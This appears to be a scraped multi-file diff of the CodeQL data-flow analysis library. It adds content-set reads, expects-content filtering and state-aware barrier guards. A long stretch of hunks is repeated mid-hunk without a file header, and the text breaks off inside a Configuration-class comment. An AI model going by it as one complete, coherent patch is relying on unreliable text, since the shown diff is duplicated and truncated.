/**
* Holds if there is a partial data flow path from `source` to `node`. The
* approximate distance between `node` and the closest source is `dist` and
@@ -345,9 +357,13 @@ private predicate fullBarrier(NodeEx node, Configuration config) {
pragma[nomagic]
private predicate stateBarrier(NodeEx node, FlowState state, Configuration config) {
exists(Node n |
node.asNode() = n and
exists(Node n | node.asNode() = n |
config.isBarrier(n, state)
or
exists(BarrierGuard g |
config.isBarrierGuard(g, state) and
n = g.getAGuardedNode()
)
)
}
@@ -477,8 +493,9 @@ private predicate additionalJumpStateStep(
)
}
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
read(node1.asNode(), c, node2.asNode()) and
pragma[nomagic]
private predicate readSet(NodeEx node1, ContentSet c, NodeEx node2, Configuration config) {
readSet(node1.asNode(), c, node2.asNode()) and
stepFilter(node1, node2, config)
or
exists(Node n |
@@ -488,6 +505,37 @@ private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration conf
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
exists(ContentSet cs |
readSet(node1, cs, node2, config) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate clearsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
clearsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate expectsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
expectsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
pragma[nomagic]
private predicate notExpectsContent(NodeEx n) { not expectsContentCached(n.asNode(), _) }
pragma[nomagic]
private predicate store(
NodeEx node1, TypedContent tc, NodeEx node2, DataFlowType contentType, Configuration config
) {
@@ -565,9 +613,9 @@ private module Stage1 {
)
or
// read
exists(Content c |
fwdFlowRead(c, node, cc, config) and
fwdFlowConsCand(c, config)
exists(ContentSet c |
fwdFlowReadSet(c, node, cc, config) and
fwdFlowConsCandSet(c, _, config)
)
or
// flow into a callable
@@ -591,10 +639,10 @@ private module Stage1 {
private predicate fwdFlow(NodeEx node, Configuration config) { fwdFlow(node, _, config) }
pragma[nomagic]
private predicate fwdFlowRead(Content c, NodeEx node, Cc cc, Configuration config) {
private predicate fwdFlowReadSet(ContentSet c, NodeEx node, Cc cc, Configuration config) {
exists(NodeEx mid |
fwdFlow(mid, cc, config) and
read(mid, c, node, config)
readSet(mid, c, node, config)
)
}
@@ -612,6 +660,16 @@ private module Stage1 {
)
}
/**
* Holds if `cs` may be interpreted in a read as the target of some store
* into `c`, in the flow covered by `fwdFlow`.
*/
pragma[nomagic]
private predicate fwdFlowConsCandSet(ContentSet cs, Content c, Configuration config) {
fwdFlowConsCand(c, config) and
c = cs.getAReadContent()
}
pragma[nomagic]
private predicate fwdFlowReturnPosition(ReturnPosition pos, Cc cc, Configuration config) {
exists(RetNodeEx ret |
@@ -704,9 +762,9 @@ private module Stage1 {
)
or
// read
exists(NodeEx mid, Content c |
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
exists(NodeEx mid, ContentSet c |
readSet(node, c, mid, config) and
fwdFlowConsCandSet(c, _, pragma[only_bind_into](config)) and
revFlow(mid, toReturn, pragma[only_bind_into](config))
)
or
@@ -732,10 +790,10 @@ private module Stage1 {
*/
pragma[nomagic]
private predicate revFlowConsCand(Content c, Configuration config) {
exists(NodeEx mid, NodeEx node |
exists(NodeEx mid, NodeEx node, ContentSet cs |
fwdFlow(node, pragma[only_bind_into](config)) and
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
readSet(node, cs, mid, config) and
fwdFlowConsCandSet(cs, c, pragma[only_bind_into](config)) and
revFlow(pragma[only_bind_into](mid), _, pragma[only_bind_into](config))
)
}
@@ -754,7 +812,8 @@ private module Stage1 {
* Holds if `c` is the target of both a read and a store in the flow covered
* by `revFlow`.
*/
private predicate revFlowIsReadAndStored(Content c, Configuration conf) {
pragma[nomagic]
predicate revFlowIsReadAndStored(Content c, Configuration conf) {
revFlowConsCand(c, conf) and
revFlowStore(c, _, _, conf)
}
@@ -853,8 +912,8 @@ private module Stage1 {
pragma[nomagic]
predicate readStepCand(NodeEx n1, Content c, NodeEx n2, Configuration config) {
revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config)) and
read(n1, c, n2, pragma[only_bind_into](config))
read(n1, c, n2, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config))
}
pragma[nomagic]
@@ -864,7 +923,10 @@ private module Stage1 {
predicate revFlow(
NodeEx node, FlowState state, boolean toReturn, ApOption returnAp, Ap ap, Configuration config
) {
revFlow(node, toReturn, config) and exists(state) and exists(returnAp) and exists(ap)
revFlow(node, toReturn, pragma[only_bind_into](config)) and
exists(state) and
exists(returnAp) and
exists(ap)
}
private predicate throughFlowNodeCand(NodeEx node, Configuration config) {
@@ -1110,8 +1172,8 @@ private module Stage2 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
bindingset[node1, state1, config]
bindingset[node2, state2, config]
@@ -1139,11 +1201,26 @@ private module Stage2 {
private predicate flowIntoCall = flowIntoCallNodeCand1/5;
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
expectsContentEx(node, c)
)
}
bindingset[node, state, ap, config]
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
PrevStage::revFlowState(state, config) and
PrevStage::revFlowState(state, pragma[only_bind_into](config)) and
exists(ap) and
not stateBarrier(node, state, config)
not stateBarrier(node, state, config) and
(
notExpectsContent(node)
or
ap = true and
expectsContentCand(node, config)
)
}
bindingset[ap, contentType]
@@ -1198,7 +1275,7 @@ private module Stage2 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -1566,7 +1643,7 @@ private module Stage2 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -1604,10 +1681,24 @@ private module Stage2 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -1698,7 +1789,8 @@ private module LocalFlowBigStep {
private class FlowCheckNode extends NodeEx {
FlowCheckNode() {
castNode(this.asNode()) or
clearsContentCached(this.asNode(), _)
clearsContentCached(this.asNode(), _) or
expectsContentCached(this.asNode(), _)
}
}
@@ -1706,18 +1798,31 @@ private module LocalFlowBigStep {
* Holds if `node` can be the first node in a maximal subsequence of local
* flow steps in a dataflow path.
*/
predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
Stage2::revFlow(node, state, config) and
(
sourceNode(node, state, config) or
jumpStep(_, node, config) or
additionalJumpStep(_, node, config) or
additionalJumpStateStep(_, _, node, state, config) or
node instanceof ParamNodeEx or
node.asNode() instanceof OutNodeExt or
store(_, _, node, _, config) or
read(_, _, node, config) or
sourceNode(node, state, config)
or
jumpStep(_, node, config)
or
additionalJumpStep(_, node, config)
or
additionalJumpStateStep(_, _, node, state, config)
or
node instanceof ParamNodeEx
or
node.asNode() instanceof OutNodeExt
or
Stage2::storeStepCand(_, _, _, node, _, config)
or
Stage2::readStepCand(_, _, node, config)
or
node instanceof FlowCheckNode
or
exists(FlowState s |
additionalLocalStateStep(_, s, node, state, config) and
s != state
)
)
}
@@ -1731,12 +1836,15 @@ private module LocalFlowBigStep {
additionalJumpStep(node, next, config) or
flowIntoCallNodeCand1(_, node, next, config) or
flowOutOfCallNodeCand1(_, node, next, config) or
store(node, _, next, _, config) or
read(node, _, next, config)
Stage2::storeStepCand(node, _, _, next, _, config) or
Stage2::readStepCand(node, _, next, config)
)
or
exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
additionalJumpStateStep(node, state, next, s, config)
or
additionalLocalStateStep(node, state, next, s, config) and
s != state
)
or
Stage2::revFlow(node, state, config) and
@@ -1770,42 +1878,40 @@ private module LocalFlowBigStep {
*/
pragma[nomagic]
private predicate localFlowStepPlus(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
DataFlowType t, Configuration config, LocalCallContext cc
NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
Configuration config, LocalCallContext cc
) {
not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
(
localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
(
localFlowStepNodeCand1(node1, node2, config) and
state1 = state2 and
preservesValue = true and
t = node1.getDataFlowType() // irrelevant dummy value
t = node1.getDataFlowType() and // irrelevant dummy value
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
preservesValue = false and
t = node2.getDataFlowType()
) and
node1 != node2 and
cc.relevantFor(node1.getEnclosingCallable()) and
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
or
exists(NodeEx mid |
localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
pragma[only_bind_into](config), cc) and
localFlowStepNodeCand1(mid, node2, config) and
not mid instanceof FlowCheckNode and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
)
or
exists(NodeEx mid, FlowState st |
localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
exists(NodeEx mid |
localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
not mid instanceof FlowCheckNode and
preservesValue = false and
t = node2.getDataFlowType() and
Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
t = node2.getDataFlowType()
)
)
}
@@ -1819,9 +1925,19 @@ private module LocalFlowBigStep {
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
) {
localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
callContext) and
localFlowExit(node2, state2, config)
localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
localFlowExit(node2, state1, config) and
state1 = state2
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
state1 != state2 and
preservesValue = false and
apf = TFrontNil(node2.getDataFlowType()) and
callContext.relevantFor(node1.getEnclosingCallable()) and
not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
isUnreachableInCallCached(node1.asNode(), call) or
isUnreachableInCallCached(node2.asNode(), call)
)
}
}
@@ -1879,8 +1995,8 @@ private module Stage3 {
bindingset[call, c, innercc]
private CcNoCall getCallContextReturn(DataFlowCallable c, DataFlowCall call, Cc innercc) { any() }
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
private predicate localStep(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
@@ -1894,7 +2010,34 @@ private module Stage3 {
private predicate flowIntoCall = flowIntoCallNodeCand2/5;
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap) { ap.isClearedAt(node.asNode()) }
private predicate clearSet(NodeEx node, ContentSet c, Configuration config) {
PrevStage::revFlow(node, config) and
clearsContentCached(node.asNode(), c)
}
pragma[nomagic]
private predicate clearContent(NodeEx node, Content c, Configuration config) {
exists(ContentSet cs |
PrevStage::readStepCand(_, pragma[only_bind_into](c), _, pragma[only_bind_into](config)) and
c = cs.getAReadContent() and
clearSet(node, cs, pragma[only_bind_into](config))
)
}
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap, Configuration config) {
clearContent(node, ap.getHead().getContent(), config)
}
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Ap ap, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::readStepCand(_, c, _, pragma[only_bind_into](config)) and
expectsContentEx(node, c) and
c = ap.getHead().getContent()
)
}
pragma[nomagic]
private predicate castingNodeEx(NodeEx node) { node.asNode() instanceof CastingNode }
@@ -1903,8 +2046,13 @@ private module Stage3 {
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
exists(state) and
exists(config) and
not clear(node, ap) and
if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()
not clear(node, ap, config) and
(if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()) and
(
notExpectsContent(node)
or
expectsContentCand(node, ap, config)
)
}
bindingset[ap, contentType]
@@ -1963,7 +2111,7 @@ private module Stage3 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -2331,7 +2479,7 @@ private module Stage3 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -2369,10 +2517,24 @@ private module Stage3 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -2693,9 +2855,8 @@ private module Stage4 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
localFlowEntry(node, _, config) and
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) {
result =
getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
node.getEnclosingCallable())
@@ -2791,7 +2952,7 @@ private module Stage4 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -3159,7 +3320,7 @@ private module Stage4 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -3197,10 +3358,24 @@ private module Stage4 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -3269,17 +3444,28 @@ private Configuration unbindConf(Configuration conf) {
exists(Configuration c | result = pragma[only_bind_into](c) and conf = pragma[only_bind_into](c))
}
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
pragma[nomagic]
private predicate nodeMayUseSummary0(
NodeEx n, DataFlowCallable c, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c, AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, apa, _) and
exists(AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, _, _) and
Stage4::revFlow(n, state, true, _, apa0, config) and
Stage4::fwdFlow(n, state, any(CallContextCall ccc), TAccessPathApproxSome(apa), apa0, config) and
n.getEnclosingCallable() = c
)
}
pragma[nomagic]
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c |
Stage4::parameterMayFlowThrough(_, c, apa, config) and
nodeMayUseSummary0(n, c, state, apa, config)
)
}
private newtype TSummaryCtx =
TSummaryCtxNone() or
TSummaryCtxSome(ParamNodeEx p, FlowState state, AccessPath ap) {
@@ -3475,7 +3661,7 @@ private newtype TPathNode =
* of dereference operations needed to get from the value in the node to the
* tracked object. The final type indicates the type of the tracked object.
*/
abstract private class AccessPath extends TAccessPath {
private class AccessPath extends TAccessPath {
/** Gets the head of this access path, if any. */
abstract TypedContent getHead();
@@ -3690,11 +3876,14 @@ abstract private class PathNodeImpl extends PathNode {
abstract NodeEx getNodeEx();
predicate isHidden() {
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
not this.getConfiguration().includeHiddenNodes() and
(
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
)
}
private string ppAp() {
@@ -4171,10 +4360,16 @@ private module Subpaths {
exists(NodeEx n1, NodeEx n2 | n1 = n.getNodeEx() and n2 = result.getNodeEx() |
localFlowBigStep(n1, _, n2, _, _, _, _, _) or
store(n1, _, n2, _, _) or
read(n1, _, n2, _)
readSet(n1, _, n2, _)
)
}
pragma[nomagic]
private predicate hasSuccessor(PathNode pred, PathNodeMid succ, NodeEx succNode) {
succ = pred.getASuccessor() and
succNode = succ.getNodeEx()
}
/**
* Holds if `(arg, par, ret, out)` forms a subpath-tuple, that is, flow through
* a subpath between `par` and `ret` with the connecting edges `arg -> par` and
@@ -4182,15 +4377,13 @@ private module Subpaths {
*/
predicate subpaths(PathNode arg, PathNodeImpl par, PathNodeImpl ret, PathNode out) {
exists(ParamNodeEx p, NodeEx o, FlowState sout, AccessPath apout, PathNodeMid out0 |
pragma[only_bind_into](arg).getASuccessor() = par and
pragma[only_bind_into](arg).getASuccessor() = out0 and
subpaths03(arg, p, localStepToHidden*(ret), o, sout, apout) and
pragma[only_bind_into](arg).getASuccessor() = pragma[only_bind_into](out0) and
subpaths03(pragma[only_bind_into](arg), p, localStepToHidden*(ret), o, sout, apout) and
hasSuccessor(pragma[only_bind_into](arg), par, p) and
not ret.isHidden() and
par.getNodeEx() = p and
out0.getNodeEx() = o and
out0.getState() = sout and
out0.getAp() = apout and
(out = out0 or out = out0.projectToSink())
pathNode(out0, o, sout, _, _, apout, _, _)
|
out = out0 or out = out0.projectToSink()
)
}
@@ -4526,7 +4719,11 @@ private module FlowExploration {
or
exists(PartialPathNodeRev mid |
revPartialPathStep(mid, node, state, sc1, sc2, sc3, ap, config) and
not clearsContentCached(node.asNode(), ap.getHead()) and
not clearsContentEx(node, ap.getHead()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead())
) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
distSink(node.getEnclosingCallable(), config) <= config.explorationLimit()
@@ -4542,7 +4739,11 @@ private module FlowExploration {
partialPathStep(mid, node, state, cc, sc1, sc2, sc3, ap, config) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
not clearsContentCached(node.asNode(), ap.getHead().getContent()) and
not clearsContentEx(node, ap.getHead().getContent()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead().getContent())
) and
if node.asNode() instanceof CastingNode
then compatibleTypes(node.getDataFlowType(), ap.getType())
else any()
@@ -4976,6 +5177,7 @@ private module FlowExploration {
)
}
pragma[nomagic]
private predicate revPartialPathStep(
PartialPathNodeRev mid, NodeEx node, FlowState state, TRevSummaryCtx1 sc1, TRevSummaryCtx2 sc2,
TRevSummaryCtx3 sc3, RevPartialAccessPath ap, Configuration config

}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
localFlowEntry(node, _, config) and
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) {
result =
getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
node.getEnclosingCallable())
@@ -2791,7 +2952,7 @@ private module Stage4 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -3159,7 +3320,7 @@ private module Stage4 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -3197,10 +3358,24 @@ private module Stage4 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -3269,17 +3444,28 @@ private Configuration unbindConf(Configuration conf) {
exists(Configuration c | result = pragma[only_bind_into](c) and conf = pragma[only_bind_into](c))
}
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
pragma[nomagic]
private predicate nodeMayUseSummary0(
NodeEx n, DataFlowCallable c, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c, AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, apa, _) and
exists(AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, _, _) and
Stage4::revFlow(n, state, true, _, apa0, config) and
Stage4::fwdFlow(n, state, any(CallContextCall ccc), TAccessPathApproxSome(apa), apa0, config) and
n.getEnclosingCallable() = c
)
}
pragma[nomagic]
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c |
Stage4::parameterMayFlowThrough(_, c, apa, config) and
nodeMayUseSummary0(n, c, state, apa, config)
)
}
private newtype TSummaryCtx =
TSummaryCtxNone() or
TSummaryCtxSome(ParamNodeEx p, FlowState state, AccessPath ap) {
@@ -3475,7 +3661,7 @@ private newtype TPathNode =
* of dereference operations needed to get from the value in the node to the
* tracked object. The final type indicates the type of the tracked object.
*/
abstract private class AccessPath extends TAccessPath {
private class AccessPath extends TAccessPath {
/** Gets the head of this access path, if any. */
abstract TypedContent getHead();
@@ -3690,11 +3876,14 @@ abstract private class PathNodeImpl extends PathNode {
abstract NodeEx getNodeEx();
predicate isHidden() {
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
not this.getConfiguration().includeHiddenNodes() and
(
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
)
}
private string ppAp() {
@@ -4171,10 +4360,16 @@ private module Subpaths {
exists(NodeEx n1, NodeEx n2 | n1 = n.getNodeEx() and n2 = result.getNodeEx() |
localFlowBigStep(n1, _, n2, _, _, _, _, _) or
store(n1, _, n2, _, _) or
read(n1, _, n2, _)
readSet(n1, _, n2, _)
)
}
pragma[nomagic]
private predicate hasSuccessor(PathNode pred, PathNodeMid succ, NodeEx succNode) {
succ = pred.getASuccessor() and
succNode = succ.getNodeEx()
}
/**
* Holds if `(arg, par, ret, out)` forms a subpath-tuple, that is, flow through
* a subpath between `par` and `ret` with the connecting edges `arg -> par` and
@@ -4182,15 +4377,13 @@ private module Subpaths {
*/
predicate subpaths(PathNode arg, PathNodeImpl par, PathNodeImpl ret, PathNode out) {
exists(ParamNodeEx p, NodeEx o, FlowState sout, AccessPath apout, PathNodeMid out0 |
pragma[only_bind_into](arg).getASuccessor() = par and
pragma[only_bind_into](arg).getASuccessor() = out0 and
subpaths03(arg, p, localStepToHidden*(ret), o, sout, apout) and
pragma[only_bind_into](arg).getASuccessor() = pragma[only_bind_into](out0) and
subpaths03(pragma[only_bind_into](arg), p, localStepToHidden*(ret), o, sout, apout) and
hasSuccessor(pragma[only_bind_into](arg), par, p) and
not ret.isHidden() and
par.getNodeEx() = p and
out0.getNodeEx() = o and
out0.getState() = sout and
out0.getAp() = apout and
(out = out0 or out = out0.projectToSink())
pathNode(out0, o, sout, _, _, apout, _, _)
|
out = out0 or out = out0.projectToSink()
)
}
@@ -4526,7 +4719,11 @@ private module FlowExploration {
or
exists(PartialPathNodeRev mid |
revPartialPathStep(mid, node, state, sc1, sc2, sc3, ap, config) and
not clearsContentCached(node.asNode(), ap.getHead()) and
not clearsContentEx(node, ap.getHead()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead())
) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
distSink(node.getEnclosingCallable(), config) <= config.explorationLimit()
@@ -4542,7 +4739,11 @@ private module FlowExploration {
partialPathStep(mid, node, state, cc, sc1, sc2, sc3, ap, config) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
not clearsContentCached(node.asNode(), ap.getHead().getContent()) and
not clearsContentEx(node, ap.getHead().getContent()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead().getContent())
) and
if node.asNode() instanceof CastingNode
then compatibleTypes(node.getDataFlowType(), ap.getType())
else any()
@@ -4976,6 +5177,7 @@ private module FlowExploration {
)
}
pragma[nomagic]
private predicate revPartialPathStep(
PartialPathNodeRev mid, NodeEx node, FlowState state, TRevSummaryCtx1 sc1, TRevSummaryCtx2 sc2,
TRevSummaryCtx3 sc3, RevPartialAccessPath ap, Configuration config

View File

@@ -94,15 +94,19 @@ abstract class Configuration extends string {
predicate isBarrierGuard(BarrierGuard guard) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis.
* Holds if data flow through nodes guarded by `guard` is prohibited when
* the flow state is `state`.
*/
predicate isBarrierGuard(BarrierGuard guard, FlowState state) { none() }
/**
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
*/
predicate isAdditionalFlowStep(Node node1, Node node2) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis. This step is only applicable in `state1` and
* updates the flow state to `state2`.
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalFlowStep(Node node1, FlowState state1, Node node2, FlowState state2) {
none()
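// ---------------------------------------------------------------------------------
// Illustrative sketch only (not part of this library): how a query-side configuration
// might use the state-aware overloads documented above. It assumes the language's
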